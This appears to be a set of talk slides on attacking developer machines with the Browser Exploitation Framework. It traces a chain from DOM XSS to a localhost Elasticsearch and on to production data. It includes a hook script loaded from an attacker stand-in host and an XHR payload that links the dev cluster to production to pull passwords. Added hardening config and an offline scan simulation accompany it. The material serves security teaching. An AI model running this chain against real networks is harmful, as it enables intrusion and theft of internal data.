Exploiting Local Dev Environments

Running Locally

BeEF

  • Browser Exploitation Framework (BeEF)
  • Creates a browser botnet that can be controlled by a central server
  • “BeEF looks past the hardened network perimeter and examines exploitability within the context of the one open door: the web browser”
    • What security assumption does this exploit?
      • Our VPN protects our network from the public internet

How does BeEF work?

  1. Bob visits a page with malicious JavaScript
    • Ex: Mallory’s DOM XSS loaded evil.example.com:3000/hook.js
  2. hook.js polls Mallory’s Command and Control (C&C) server for instructions
  3. Through the C&C server, Mallory launches attacks from the victim’s browser, with the victim’s network position
    • BeEF allows Mallory to…
      1. Find servers on the victim’s local area network (LAN)
        • Including services listening on localhost, which the public internet can never reach directly
      2. Make REST requests to these servers if their CORS policy isn’t strict
      3. Execute arbitrary JavaScript payloads within the victim’s browser

Demo: How To Find A Dev’s ES Instance

  • Leverage the BeEF Cross-Origin Scanner Module
  • Check for an Elasticsearch (ES) instance running locally (localhost:9200) with a permissive CORS policy
  • If ES has a permissive CORS policy, BeEF can
    • Send any type of REST request to the DEV ES instance, reads and writes alike
      • ES 5.6 Community Edition currently has no authentication built in
        • That includes the cluster settings API and the transport (clustering) interface on port 9300
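The weak setting the demo relies on, beside the setting that closes it, as an added example that is not from the page or the BeEF project. The http.cors.* keys are Elasticsearch’s own settings; the origins are illustrative. CORS only controls whether a page’s script may read the response and whether its preflighted writes are answered; it does not hide the listener itself.

```yaml
# Added example; not from the page. elasticsearch.yml settings that make a
# DEV instance readable and writable from any web page, beside the hardened form.
# The http.cors.* keys are Elasticsearch's own; origins are illustrative.

# --- Weak: what the DEV instance in the demo is assumed to run ---
http.cors.enabled: true
http.cors.allow-origin: "*"     # evil.example.com qualifies as much as your own UI
http.cors.allow-methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
http.cors.allow-headers: X-Requested-With, Content-Type, Content-Length

# --- Hardened: leave CORS off (the 5.x default). A cross-origin page then gets
# --- an opaque response and its preflighted PUT/POST is refused by the browser.
# http.cors.enabled: false

# --- If a browser-based tool genuinely needs it, allow exactly that origin
# --- (Elasticsearch accepts a regex wrapped in slashes) rather than "*".
# http.cors.enabled: true
# http.cors.allow-origin: /https?:\/\/localhost(:[0-9]+)?/
```

Note that none of these settings touch the transport port (9300) or add authentication; they only stop a hooked browser from using the HTTP API directly.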

Demo: Finding A Prod ES Instance

  • Scenario
    • Dev is on the VPN
    • The VPN network contains a PROD ES instance
    • PROD ES instance doesn’t allow CORS
      • It’s “locked down”, so direct BeEF requests won’t work
      • “It’s safe because it’s on the VPN”
  • BeEF Port Scanner Module
    • Uses techniques that sidestep browser port blocking and the Same Origin Policy
      • If a server doesn’t allow CORS, the browser still reveals whether it exists: a refused connection, a timeout and a completed (but unreadable) response each fail differently
      • Uses WebSockets, <img src=""> tags, etc.

Demo: Finding A Prod ES Instance (CONT.)

  • Future: script to scan a whole subnet for hosts
    • The Port Scanner module currently scans one host at a time
  • For simplicity we’ll scan prod.example.com:9201
    • The DNS name is only there to keep DEV and PROD visibly separate
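The decision logic behind both the Cross-Origin Scanner (can the hook read the DEV instance?) and the Port Scanner (does PROD exist even though it refuses CORS?), as an added example that is not BeEF’s code or the page’s. Everything runs offline: the target table and the fetch implementation are constructed stand-ins for the DEV and PROD Elasticsearch instances, and the probe states (closed, filtered, open-opaque, open-readable) are names chosen here.

```javascript
// Added example (not BeEF's code or the page's): how a hooked browser's
// cross-origin probes separate "readable", "present but opaque" and "absent".
// The targets and the fetch implementation below are constructed stand-ins.

// A simple (no-credentials) cross-origin response is readable by script from
// `origin` only if the server opted in via Access-Control-Allow-Origin.
function corsAllowsRead(origin, headers) {
  const acao = headers["access-control-allow-origin"];
  return acao === "*" || acao === origin;
}

// What the hook can observe for one URL. `result` is either
// { kind: "response", status, headers, body } or { kind: "error", code }.
//   closed        - TCP refused: nothing listening (fails fast)
//   filtered      - no answer before the timeout (dropped/blocked)
//   open-opaque   - something answered, but CORS forbids reading it
//   open-readable - something answered and script may read the body
function classifyProbe(origin, result) {
  if (result.kind === "error") {
    return result.code === "ETIMEDOUT" ? "filtered" : "closed";
  }
  return corsAllowsRead(origin, result.headers) ? "open-readable" : "open-opaque";
}

// Constructed stand-ins. In a real browser the hook would use fetch()/XHR,
// <img> onload/onerror timing or a WebSocket handshake; here the network is a
// lookup table so the example is deterministic.
const FAKE_NETWORK = {
  // DEV ES: http.cors.enabled with allow-origin "*" and no authentication
  "http://localhost:9200/": {
    kind: "response", status: 200,
    headers: { "content-type": "application/json", "access-control-allow-origin": "*" },
    body: JSON.stringify({ cluster_name: "dev-es", version: { number: "5.6.0" } }),
  },
  // PROD ES: reachable over the VPN but with CORS disabled
  "http://prod.example.com:9200/": {
    kind: "response", status: 200,
    headers: { "content-type": "application/json" },
    body: JSON.stringify({ cluster_name: "prod-es" }),
  },
  // Nothing listening on this port
  "http://localhost:9999/": { kind: "error", code: "ECONNREFUSED" },
};
function fakeFetch(url) {
  return FAKE_NETWORK[url] ?? { kind: "error", code: "ETIMEDOUT" };
}

// Scan a list of URLs from the point of view of a page served from `origin`.
// Bodies are parsed only where the browser would have let script read them.
function scan(origin, urls, fetchImpl = fakeFetch) {
  const report = {};
  for (const url of urls) {
    const result = fetchImpl(url);
    const state = classifyProbe(origin, result);
    report[url] = {
      state,
      cluster: state === "open-readable" ? JSON.parse(result.body).cluster_name : null,
    };
  }
  return report;
}

// Mallory's hook runs in a page served from evil.example.com:3000
const report = scan("http://evil.example.com:3000", [
  "http://localhost:9200/",
  "http://prod.example.com:9200/",
  "http://localhost:9999/",
  "http://10.0.0.7:9200/",
]);
console.log(report);
```

The row worth staring at is PROD: it comes back open-opaque, not absent. Disabling CORS stops the hook from reading or writing, but the browser still tells the attacker that a listener is there, which is all the port scanner needs.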

Exfiltrating Data

  • Due to the PROD ES CORS policy, BeEF can’t talk to it directly from the browser…
  • How could Mallory exfiltrate data while covering her tracks?
    • Have DEV ES join PROD ES as a cluster member?
    • Better: leverage Cross Cluster Search so DEV ES queries PROD ES without joining as a cluster member
      • No syncing of the complete dataset, and every request PROD sees comes from the developer’s own machine

Demo: Cross Cluster Search

// Sent from the hooked browser. A PUT with a JSON body is a preflighted
// cross-origin request, which the DEV instance's permissive CORS policy
// answers; with no authentication, any page can change cluster settings.
var xhr = new XMLHttpRequest();
xhr.open('PUT', "http://localhost:9200/_cluster/settings", true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.send(JSON.stringify({
  "persistent": {                   // survives a DEV restart
    "search": {
      "remote": {                   // search.remote.* is the 5.x/6.x name; later versions use cluster.remote.*
        "cluster_one": {            // alias used in queries as cluster_one:<index>
          "seeds": [
            "prod.example.com:9300" // PROD transport port, reachable from the dev box over the VPN
          ]
        }
      }
    }
  }
}));

Demo: Searching The PROD Cluster

  • PROD is pre-seeded with a sensitive-data index containing passwords
  • Leverage the BeEF CORS Request Module
    • The request is issued from the victim’s computer to the victim’s own DEV ES, which forwards it to PROD over the cluster link
      • http://localhost:9200/*:sensitive-data/_search?pretty

Assumption Recap

  • How did this all happen?
  • DOM XSS allowed Mallory to control the victim’s browser
    • “Client-side XSS validation is a bad practice”
  • Permissive CORS policy within the DEV environment
    • Allowed Mallory to establish a connection from DEV to the PROD ES instance
    • “The outside internet can’t interact with a process listening on localhost”
  • Leveraging CE software with no authentication
    • Allowed Mallory to exfiltrate data out of the production ES instance
    • “Our authentication is our VPN”

Mitigations

Knowledge Dependency Tree